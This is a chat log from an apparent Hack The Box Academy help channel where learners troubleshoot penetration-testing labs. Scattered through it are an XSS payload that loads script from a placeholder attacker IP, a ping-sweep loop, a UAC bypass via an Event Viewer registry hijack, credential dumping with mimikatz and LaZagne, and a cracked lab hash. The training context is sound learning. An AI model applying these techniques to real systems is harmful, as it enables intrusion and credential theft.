    // CODE EXECUTION
}

Hey

Hi there !

Can someone tell me that, in this server will we learn hacking with kali linux ?

You can use whichever distro you like

I am working on 'Whitebox Attacks - User Enumeration via Response Timing', but cannot manage to work with the time response, I know if the user does not exist than the response time is 27 or 28 milliseconds, but if the user does exist is sometimes 1,027 and sometimes between 200 and 500 milliseconds. So how to enumerate the usernames.

put the module name in your message so people can help you more easily

hey guys i need help. i just completed the footprinting module lab, i completed the hard lab then i went back to the easy lab for practice, just to find out i can not remember the methodology i used to get the flag
how can i make this stick

Don't worry, you can always come back to it

But practice makes perfect

make writeups for every question in the module

obv dont publish them, keep them as a reference

https://tenor.com/view/write-that-down-taking-notes-school-universities-university-gif-17937210

Though my issue is when I lock in I forget to write it down

-# Have half a writeup for Attacking Thick Clients cos of it

Hi, I have a problem with the Web Service and API attacks module in the skill assessment section:
No matter what I do either there's no password field or I can't get any info relating to the skill assessment db

Any help would be appreciated 🙂

Replace the resolvers.txt with a file that contains the target ip

No.

Resolvers.txt is a list of public dns servers. For, what i hope should be obvious reasons, those public servers can't reach a private target

It could also be some other weird error, but that you'd have to raise the issue on the subbrute gh page

I mean my only other thing is making sure you're in the same directory as your files

¯_(ツ)_/¯

with sshutle, can I not ping internal hosts because it's TCP only?

you can try another type of ping like fping or hping

ty

but if you need to ping internal hosts, just do it from within the machine your tunnel is connected to

Hi i could really use some help with windows privesc skills assessment part I
Im trying to abuse the privilege i have enabled
I tried juicy potato which gets me recv failed with error 10038.
printspoofer returns operation failed or timed out
Metasploit also returns an error when using getsystem
And Now im stuck

Greetings everyone. Just started with HTB academy. Look forward to seeking your guidance. Kindly advise if I can post my questions during the lessons in this channel, or if there's another channel to post questions/clarifications on the modules I go through?

~~ I'm kinda confused. I'm on Web Server Pivoting with Rpivot.|| I followed the steps, had a successful connection, but when I visit the internal ip on port 80 via proxychains it doesnt load. But when I curl it with internal on port 80 (With proxy chains) it comes up with an apache default page and even when I curl from pivot machine, the same content shows. Do I need to enumerate the web app or did I just do it wrong ||. Also when I curl the pivot machine, the exact same page shows ~~ NVM I solved it. Wrong ip lol

hi i am doing planning box

but i m stuck

#boxes

.

Still having issue with ssh to the target machine (Linux Privilege Escalation - Skill Assessment)

Read from remote host 10.129.255.177: Connection reset by peer
Connection to 10.129.255.177 closed.
client_loop: send disconnect: Broken pipe

Somebody?🙏

bruh why does no one help just tell to go to another channel

Change VPN regions until it works

had the same issue with RDP yesterday, for me ignoring the cert worked

/cert:ignore not quite sure what the ssh option would be though

Can someone please explain to me what is a CLSID in juicy potato
They didnt teach that in the module

Hello
in the Introduction to Windows Command Line
in the last part
skill assessment
i'm asked as follows
but i dont have user3 password i only have the password of user0 and user1
am i supposed to enumrate user0 and user1 for the passowrd of user2 or what

There is a PS script with JP. Run that to identify CLSIDs that you can use.

https://tenor.com/view/sad-sea-dog-gif-10539169426521065658

Does the hint not provide any information that helps you?

Looks like I'm not the only one getting kicked out of SSH because of "Broken pipe" today?

Trying to switch regions now as suggested before...though I've already been through the region switching a few days ago because it wouldn't let me go into Full Screen mode on PwnBox otherwise, will see if that works now I suppose 🤷

Because this channel is for help with academy modules; if you want help with a box then ask in the appropriate channel. It's that simple.

ok

Reminder that vpn region and pwnbox region are not the same thing

understood. so was the suggestion to connect through an external VPN and go through regions there until it works?

The pwnbox utilizes the same vpn pack, you may need to restart the pwnbox when you change vpn regions

information gathering - web edition | web archives- there is no archive for this timestamp on the waybackmachine. im not sure what to do.

There is, are you sure that you are searching the correct domain?

im searching hackthebox.eu

because the older one worked for the question prior and i dont think it was registered from godaddy during 2017

nvm i found it- I still have no clue why it didnt work though because i just closed everything and re-searched/

nvm
the password of each user at each question is the answer of the previous one

Nothing like doing a ping scan of a class B network… (assuming I’m not down a rabbit hole)

Hey I’m new here who can teaching me penetration testing

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I’m sure their entire business is that. Pay for it and it teaches you….

Not all modules are to be paid for

Sure, welcome

Hi.

I'm having a hard time connecting to the xfreerdp from my pwnbox.

Command used: xfreerdp /v:<target IP> /u:htb-student /p:HTB_@cademy_stdnt!

In: https://academy.hackthebox.com/module/81/section/962

Error: Connection refused, I've checked IP, multiple times

┌──(user42㉿Kali)-[~]
└─$ for i in {1..254};do (ping -c 1 172.16.5.$i | grep "bytes from" &); done

64 bytes from 172.16.5.15: icmp_seq=1 ttl=64 time=175 ms
alright guys i'm not crazy something is up. there is no other host that is up lol

this is the tunneling and pivoting skills assessment. anyone got any input? there is literally no other live IP (and this is the webserver in the start of it) I did a full ping sweep of the class B network it's on. I think something might be broken

Share the link 🙂

https://academy.hackthebox.com/module/158/section/1441

Sorry haven't done that one yet, thought of another similar one

Have you by any chance used xfreerdp from a pwnbox? 😛

Found the problem, having my VPN running while was the problem

I have yes, but most of the time I use my own machine.

Yo

ig something is off here

So, about my module issue... lol

anyone have any ideas?

before I pull out the 2 of the 3 remaining hairs I have left on the top of my head?

Just to be sure, did you wait a few minutes before you tried doing the ping sweep?

yes, I didin't even get to the point until after I found the creds to get into it....

maybe I'll just kill the box and start over and see if that helps

sigh lol

Can i dm u?

yes

Sent 🙂

Hello
I am working on Active Directory LDAP enum skills lab.
I am stuck on last final question, what non-default privilege does the htb-student usr have?
I have tried finding interesting ACL related to it and used whoami / priv still no success. Any nudge?

Try running that from an elevated session.

I tried that machine is not allowing it

Have you tried restarting it? In my notes, I have that I needed to restart it once.

Done

Solved the entire LDAP module

https://academy.hackthebox.com/module/103/section/1008
<script src=http://OUR_IP/script.js></script>

I am stuck if anyone has a suggestion if the payload look like this except the ip field because i don't get any server request after succesfull registration

i want to know about the payload structure

Hi guys :] Just wanted to know if someone has actually been able to navigate the entire htb courses (talking about some actual ones like maybe pentester etc) WITHOUT subscription and just using cubes ? :/

I have a bootable pendrive for parrot os so maybe no need of the cloud based VMs they have maybe...just wanted to know if it is possible?

That section gives you a few different payloads you can try.

so it is other than this payload right?

Idk, test them within the different fields.

roger that

can i give one of the payloads in different fields at the same time?

Are you asking if you can test all fields at the same time? The section covers different techniques, which include testing them one at a time and doing them all the same time.

yes

I suggest reading through Loading a Remote Script again.

ok

On password attacks in the attacking LSASS section, I have gotten the lssass dump file, but using pypykatz on it triggers an error:

INFO:pypykatz:Parsing file lsass.dmp
ERROR:root:PEB parsing error!
```, I am using the latest version of pypykatz. Any help ?

parsing error is likely that the file got corrupted in transit

in powershell Get-Filehash <filename> -Method md5 should give the md5 checksum of the lsass file
in terminal when you transfer md5sum <filename> to check

if they match -- no issues
no match -- corruption, try a diff transfer method

got it, will try now

thanks for the help!

it's -Algorithm not -Method

yeah it's corrupted

finally got it working, thanks for the help marcie

Does HTB have moduels on using Havoc?

The only C2 module that I am aware of covers Sliver.

Hey the Password module had some section added to it, and for the new Hashcat section, we are supposed to crack some hashes, which are they ?

Yea it changed in a sudden

I was doing Pth from windows and boom everything changed

Like we have this

But no additionnal resource, so what are the hashes we are supposed to crack ?

I will be doing the extra sections after Completing old one's

They have also removed 2 assesments

I'm on AD & though I was done with this module, feelsbad

You will probably need to go back and start over as it looks like the whole thing was updated a bit ago. #academy-announcements message

Check the resources section, go through the sections again and you can probably find your answer

Ah I have done the ad one

If you need any help in it you can contact me

Wow everything

The assesment now only has 1 question

The same hashes that are used in the section, as they don't display the answers to those hashes being cracked.

Alright thanks

100% -> 84%

What modules did they update

I was in the middle of password attacks and just noticed a bunch of new commands in the cheat sheet lol

Nvm it looks like it was just password attacks

Just password attacks, changes get announced in #academy-announcements

Ah too slow lol

Thanks

Appreciate it

What are the best red team hacking modules in academy as a beginner? I just finished getting started.

Is there not s good path or journey i could follow that will make me a good hacker

If you want to hack mobile try out the android modules, for web try the Bugbounty path, for general pen testing try the pen testing path

As a beginner where you start does not matter as much as you might think

I'm feeling pretty helpless here. I'm working on the Using Web Proxies > Encoding/Decoding module. We get the zip file and we're supposed to decode several times for the flag. I like to use CyberChef for stuff like this. I've tried so many different configurations (taking the hint into account) and can't seem to get it to decode into anything remotely resembling a flag.

use burpsuite's decoding

That presents another question: the zip file is presented in our browser, how do I get that file contents into the browser based Linux box? I can't seem to paste into the box.

there should be a clipboard icon on the pwnbox

OH! Ok, cool. I'll try that. Thank you

also i was able to get it with cyberchef pretty easy

once you get down to %xx%xx... that's the url

So strange. We're DEcoding right?

No matter what I try, I don't end up with something that looks URL encoded. It all keeps ending with a = (which leads me to belive it's still base64 encoded)

Wait! I think I got it! I don't want to share any spoilers so I'll just shut up now. Thanks again.

Welp, shit keeps disconnecting for me, so I’ll finish tunneling and pivoting tomorrow!

Hi, I'm working through the information security foundations module but a bunch of the sections are tutorials on how to install a VM, make a pentesting platform, etc (like this https://academy.hackthebox.com/module/87/section/883)

Do I need to install all this stuff and set up everything it tells me to for the rest of the module and the pentesting path? Or are these optional and just good practice?

Not everything is necessary but you will need a linux VM and a Windows VM

And specific tools in each

Got it yeah I set up a VM on virtualbox with parrotOS

it may not be clear but the examples in the section appears to be the hashes

yep it's the examples from the section

the new windows attack one was actually sm fun, I got it in ab 20 minutes of working on it but theres no way I would've got it without doing some of the windows privsec first

loved it tho

the only hash not directly in the reading is only in the example; but they all take < 30s to crack

I have a problem......in HTB's network enumeration with nmap module, the flag for the 'nmap scripting engine' section doesn't seem to be working. And i'm pretty sure I found the right flag, cause it was in the usual HTB{***} format. the flag was found on port 31337, and i retried several times (with a new VPN, new IP)

Depending on how you tackle this exercise, you might have to deal with UAC. If that is the case, one easy solution can be found by looking up the "msconfig UAC bypass".

having issues, with knowing how to bypass the UAC

I need some help.

Module: Login Brute Forcing
Task: Skill Assessment 2
Context: I was able to SSH to the target server, and used username-anarchy to generate a list of potential usernames based on some information I found in IncidentReport.txt. I even reread the corresponding section Web Services multiple times, but everytime I attempt to find the ftp user I get an error stating unable to connect.
Command used: medusa -h <IP address> -U usernames.txt -P passwords.txt -M ftp -t 5

Hey, may i get some help in the new module for finding a UAC bypass

i haven't done that module

Ah i see

wrong port; there's a robot on a common port 😉

@fathom pendant so its giving out a wrong flag value? cause i got the flag after running the default script.

I dunno, something is off today in Academy. earlier I had those persistent "bad pipe" errors when trying to connect to a target via ssh, now that that finally works, the target cannot resolve the host address for a file I'm supposed to download, when I use the IP directly, the connection times out...all problems on the target only.
Anyone else still struggling with technical glitches? I might just call it a day and try again tomorrow, what I'm currently doing should not be the hard part of the exercise 🙈

Targets don't have internet connection so if you're tryna download something you have to download it onto your VM/pwnbox and then transfer it

usually, yeah, but in this case I think I'm really just supposed to wget it straight from source? hm. will try something else, maybe I misread that part

There is no exception, all targets have internet disabled

yep, you're right, I just can't read. And Marci has told me this before, too
alrighty, sorry about that, imma put a post-it behind my screen "TARGET DOES NOT HAVE INTERNET ACCESS" to remind myself 😅

(I mean, makes sense, too? I dunno what I was thinking there)

it's not giving a wrong value per-se; just not the flag for the section you're on, the target is reused a bit for the module

but the section focuses more on a specific port, start there

I'm kinda just starting htb but some sections just seem kinda random

like here https://academy.hackthebox.com/module/87/section/904 it's info on setting up your own VPS

but I'm not tryna set up my own VPS right now

so am I expected to do anything with this information?

I took notes and that's it

are you doing a path

yeah intro to information security

(before starting pentesting)

if its not relevant to you then skip it

alr thanks

You don't have to do any of that. I jumped right into the CPTS path with my own VM.

It can be useful information for people who don't know, though.

alr cool because I've set up a VM on my computer and that's it but there's a bunch of other sections on setting other stuff up

thanks

Yeah you really just need one way of doing it, and if you don't have any you can use the pwnbox.

ah okay got it

Test

?

I did consider what you said, but I'm spawning the target system for that section specifically. I even tried re-downloading the VPN connection file from that section to try again. And I've managed to solve the entire module except for that section. The flag I got in the section was used nowhere else. I'm thinking of raising a technical query to HTB for this now.....do u think its valid?

You don't need to follow setting up 1::1

Check the webserver robots.txt

oh i got the flag....thanks for the help!

In module Advanced Deserialization Attacks, section Example3: Binary, why do the payloads I find on the Internet are written sortedSet in the downstream form but here is the reverse? And when I write down, the error report does not have filename

Anyone familiar with how echo and the -n flag works? Just wanting to clarify something cos of different hashes I get for the new Introduction to Password Cracking section

-# nevermind I'm an idiot 😄

Can anyone give a hint to solve this?

linux priv esc targets are bit slower than usual targets (is it just for me?) using us acad2 vpn

Works pretty fine for me

are the questions in the password attack module has been changed ? because i'm doing the module again and cracking the hash in the "Writing Custom Wordlists and Rules" section gave me different answer

anyone available for https://discordapp.com/channels/473760315293696010/774040263278592041/1379419289953501234 Update (Got the user now)

try using pwnbox for it, maube it makes a differnce

I got it now

Hi,
I have a technical problem at "Introduction to Malware Analysis" --> Dynamic Analysis
How can I fix this?

Module - Captive Portal - MAC Spoofing Secrtion. After Spoofing the MAC Address the lab machine cannot connect anymore to the WLAN. What i did

• Connect to Lab machine and then connect to guest WIFI
• Lookup MAC Adresses connected to hotspot with airmon-ng and wlan1 ifc
• Lookup IPs for MAC Adresses
• take wlan0 ifc down
• spoof MAC Address for wlan0
• wlan0 ifc up
• change ip address

Then i cannot connect anymore to the Guest WIFI. Same happens with the automated script. Any help?

whenever modules get updated and shifted around, this happens

yup i did more sections and i notice that the answers are different for some of the questions

Hello
I'm working on web attacks - Advanced File Disclosure and I've been trying to use the error based method but the flag isn't showing I'm not sure if I'm requesting the right page
the machine is accessing my python server so the only issue I can think of is the flags dir

https://academy.hackthebox.com/module/134/section/1206

can anyone help?

debugging mode

anyone having issues installing dislocker ?

find a workaround, reanalyze the Logginfile with option -p // Case closed

I noticed that the three Level Labs are gone in the PASSWORD-ATTACK academy module, now there is one big Skill Assessment called 'The Credential Theft Shuffle'. So it is definitely changed compared to its yesterday structure.

Yes. I also felt a little lost when trying to use JuicyPotato. Just the content taught on the section alone is not enough.

By default, the CLSID used is that of BITS. You can find list of CLSIDs here: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

You have to try multiple CLSIDs and check which one creates the required process.

On one of the blogs that I read, following CLSIDs are reliable to escalate privileges to SYSTEM.

Can anyone tell me the answer of the final quesion in the assessment of Network Foundations

i just found out that they've added a few sections to the Password Attacks module, i am facing issue attempting to bypass the UAC in "Attacking Windows Credential Manager" section within the "passwrod attacks" module.

What is the password mcharles uses for OneDrive?

click on the Hint, it helps

yes I tried to run the msconfig and to investigate how i can use it to bypass but when I attempted to run msconfig it required admin's creds ^^

i am missing something

Did you try running it as the other user?

i tried using the runas to open msconfig with mcharles but i failed ^_^

did you runas cmd -> msconfig or just runas msconfig?

okay apparently i tried to execute it from the second user twice

my bad ^^ thanks

can anyone help me in this As this user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?

Can someone help me explain this?

Hello friends, I need to think out loud about which direction to go on the command injection skills assessment (this one caught me off guard - all the injections through the module were via POST requests and then the assessment has a GET request) each of the functions has an associated function, but some of them will throw a very visible verbose error when you try to do something illegal or malicious. If something throws an error, I should be able to use an OR operator to direct the system to my obfuscated command. Thumbs up or flames if I'm on to something.

You oughta transfer mimikatz

and yes there are other ways to get the password, mostly using tools mentioned in the module

Regarding the Penetration Testing Process Module Penetration Testing Overview section the following statement doesn't make much sense to me:

In principle, employees are not informed about the upcoming penetration tests. However, managers may decide to inform their employees about the tests. This is because employees have a right to know when they have no expectation of privacy.

My understanding is employees have no expectation of privacy with information provided to an employer for legitimate business purposes nor do they have an expectation of privacy when interacting with employer infrastructure. Is this not correct?

It means that employees usually are not aware that a pentest is being conducted but legally they can be informed so they know to expect that there is a lack of privacy depending on the terms of the contract

Weird thing to say of course they can be legally informed, the company contracting the pentest is the client and the client has this discretion. But ok. Just felt so obvious I was sure I had to be missing something

I guess my bigger concern was about the statement they have a right to know now that I think about it

Yeah it is at the clients discretion which is why the managers are the ones that do the informing and not the pentesters

this doesn't seem coherent with my current understanding of business ethics and obligations

i.e. they already know they have no expectation of privacy, so it doesn't follow that an additional duty to inform exists.

Well the client must also have a privacy policy with the employees

ahh, I see in the case of an internal company privacy which might mandate disclosure to employees

interesting, alright thank you @waxen totem

All in all it depends on the contracts already in place and the contracts to be set in place

Hi I am doing Password Attacks Introduction to Hashcat
im trying to crack the first hash, which is '$1$FNr44XZC$wQxY6HHLrgrGX0e1195k.1', I used this command
hashcat -a 0 -m 500 '$1$FNr44XZC$wQxY6HHLrgrGX0e1195k.1' rockyou.txt
it gave me ||forever21|| but it's incorrect answer

It's the other hash

that's the 0th hash...(?)

!!!!!

which one?

the next one that appears

can someone who has done the module Attacking Common Applications dm me

Which section do you wanna ask about?

I have done a few sections

now Im stuck on Miscellaneous Applications

can I dm you?

havent done them yet, but sure

What it does everyone.

"Introduction to Malware Analysis" -->Code Analysis How can I transfer data (resources) from Webportal HTB to the PWNBox?

@forest zenith

I know someone who's good at it

Module : Password Attacks
https://academy.hackthebox.com/module/147/section/1334

I think in this one, the ans to the question in incorrect now after the change, though still showing correct. I can't resubmit the correct ans as I did it before.

Also, did anyone solve this new question? I'm stuck in this.

Hi guys, I have a problem with the academy module for the cpts. In particular, with the Privileged Access in Acrtive Directory Enumeration & Attacs. The problem is with the question "What host can this user access via WinRM? (just the computer name) ?" I tried with all the hosts in the ad and resetted multiple times the machine. I answered the all the questions except of this. Any help pls? I'm currently stuck
Obviously I used the powerview command and the bloodhound raw cypher without success

Hi

hey guys i was at system info but their ques they didnt even taught much

but have given much higher level ques

hello

Hey, Dm Me I have solved this module

Same here, were you able to complete the second question ?

No bro, tried whole day
No solution

look for files on the shares

I found credentials, but doesn't seem to work, even though its very likely they are the correct ones, looking at them

just completed the new Attacking Windows Credential Manager section

Yeah but check this one. It's wrong should be reset I guess.

is it just me or does it not provide nearly enough info to succeed without external resources

module got updated so the answers filled in won't match the expected answer

they won't reset it, this happens whenever modules get updated and things get shifted around

to complete it using the methods provided you need to do a UAC bypass, which seems out of scope for password attacks

and the easier ways to do it arent mentioned at all, which seems silly

what section?

Attacking Windows Credential Manager

Password Attacks module

Can I dm you?

i don't see where UAC bypass is needed

for the mimikatz example provided you need admin

I found a way to do it in mimikatz that didn't require it and i think it's strange the module didnt mention it

lab is taking forever to spawn for me; when i get around to recompleting this module i'll update you

i used a completely different method that didn't require UAC, mimikatz is not the only way

there's a few tools mentioned

like lazagne; literally ran it without needing to go through UAC bypass methods

Running both LaZagne and mimikatz both come back with empty password results, anything im missing?

@fathom pendant is hack the box certificate free?

No

Did you do the runas command?

Attacking Windows Credential Manager

I am having trouble with this new page/module added. This is my last question to complete the CPTS path.

Yes I have checked the hint. The UAC is how I was able to get mimikatz to run. I swapped the registery of eventviewer with mimikatz and that is how it was able to run. Now I have plaintext admin pass for mcharles.

Just not getting the onedrive cred. I am able to use the admin access from the mcharles user. I just can't get the onedrive password.

Question:"What is the password mcharles uses for OneDrive?"

to start cmd as mcharles?

Hello, I would like to know if it is possible to have information on a license plate?

Relay to SMS_admin appears to work, but doesn't. Why? Anyone? @fathom pendant ?

The second question for the Credential Hunting in Network Shares section of the new Password Attacks module is a pain 👀
has anyone been able to complete it ?

Okay so i just reset the box and i got it, previously it was showing null values and even the vaults being completley empty except for the policys. thanks !

Haven't touched that module

You'll need to get the new answer for the first question if it was already filled in

yep, done that already! But still no luck.
Been spidering through shares for hours now with the "new" user, and the only thing looking like the answer is not working

I ended up impersonating the user and then running ||vault::cred|| in mimikatz. Anyway my point is that it’s weird/bad the method the module actually walks through is the not best one

Lazagne is delicious

Did you need to impersonate the user first?

The password required for the module is not saved in the vault of the user you’re given creds for, right?

mcharles cred vault wouldnt show up with vault::cred if i was the inital account

Just checking my understanding here

hi people i am new here i want to start

https://academy.hackthebox.com/ is your first step

When i transfer over either lazagne.exe or lazagne.py. Both fail to start. I will try again

Make sure you save them to a write writeable directory, but the .exe should work

C:/temp

Not #general

Please read #welcome and #rules it will explain how to get verified

Thank you so much! I will say, lazagne.exe works but it will still crash after running for 5 -10 seconds. Luckily, I just kept rerunning it until I got a glimpse of the password!

run it through cmd

hey

I am new here

Please read #welcome and #rules it will explain how to get verified

For those trying for the second question of the Credential Hunting in Network Shares section of the new Password Attacks module, enumeration is an iterative process 😉

Also, the question is misleading

But yeah, iterative process 😄

Another 'duh' moment: forgot the 'DOMAIN\' — it sometimes is really that simple.

What is the usual cause if my Windows 7 target host crashes when attempting a binary exploit? (Entire target crashed, had to reset unfortunately)

hey people, im stuck in Writing Custom Wordlists and Rules with Hashcat, need help please. Anyone?

For the cracking protected archive’s part of password attacks what exactly is the sudo dislocker /dev/loop0p2 -u1234qwer - - /media/bitlocker

What does that do